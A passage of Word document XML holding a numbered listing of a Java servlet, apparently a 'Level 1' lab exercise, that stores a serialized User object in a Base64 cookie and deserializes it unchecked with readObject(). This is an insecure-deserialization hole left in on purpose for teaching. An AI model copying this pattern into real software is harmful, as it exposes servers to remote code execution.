              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54AE60EA" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C8E36D" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C9998C" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52147E9A" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7749C5C4" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6434D8A7" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A686099" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>public class HelloServlet extends HttpServlet {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="714EB6EE" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    public String serializeToBase64(Serializable obj) throws IOException {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73CCB122" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        ByteArrayOutputStream output = new ByteArrayOutputStream();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB45C1E" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        ObjectOutputStream oos = new ObjectOutputStream(output);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="383E9AA1" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        oos.writeObject(obj);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54BEE103" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        oos.close();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39CB17B7" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        return Base64.getEncoder().encodeToString(output.toByteArray());</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F59A956" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DC22A9F" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A66C54E" w14:textId="77777777" w:rsidR="001B7E5A" w:rsidRPr="001B7E5A" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    private static Object deserializeFromBase64(String s) throws IOException, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CEA028F" w14:textId="4E9D0F74" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>ClassNotFoundException {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4870F7E6" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        byte[] data = Base64.getDecoder().decode(s);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E30520" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10487CE9" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        Object o  = ois.readObject();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47ECB9C8" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        ois.close();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F9FFDE7" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        return o;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17DC755D" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F8F4095" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CA6EC9D" w14:textId="77777777" w:rsidR="001B7E5A" w:rsidRPr="001B7E5A" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    public void doGet(HttpServletRequest request, HttpServletResponse response) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35AD7F21" w14:textId="4C0BD2E8" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>throws IOException {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BF2D726" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        try {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E34B58F" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            response.setContentType("text/html");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1725DFE1" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            PrintWriter out = response.getWriter();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="230A85AB" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            // Get list of cookie</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="442BFB60" w14:textId="77777777" w:rsidR="001B7E5A" w:rsidRPr="001B7E5A" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            Map&lt;String, String&gt; cookieMap = </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44F6E431" w14:textId="77777777" w:rsidR="001B7E5A" w:rsidRPr="001B7E5A" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Arrays.stream(request.getCookies()).collect(Collectors.toMap(Cookie::getName, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B6BD2C" w14:textId="66577A2C" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Cookie::getValue));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E8428D6" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            // Check is user cookie has already set</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F1F6A25" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            User user;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1337BD19" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            if (!cookieMap.containsKey("user")) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C5E2FA3" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                user = new User();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24566BF7" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">                Cookie cookie = new Cookie("user", serializeToBase64(user));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22789DDA" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                response.addCookie(cookie);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="084C73BD" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            } else {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7800CE55" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                try {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F88751" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                    user = (User)deserializeFromBase64(cookieMap.get("user"));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="466C12C1" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                } catch (Exception e) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B185845" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                    out.println("Please don't hack me");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FFF26F5" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                    e.printStackTrace();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A866150" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                    return;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="405031E0" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F9622DC" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DC42C83" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            out.println("&lt;html&gt;&lt;body&gt;");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09EC6839" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            out.println("&lt;h1&gt;Level 1 Hello " + user + "&lt;/h1&gt;");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D6702E3" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            out.println("&lt;/body&gt;&lt;/html&gt;");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03E69071" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        } catch (Exception e) {</w:t>
            </w:r>
          </w:p>
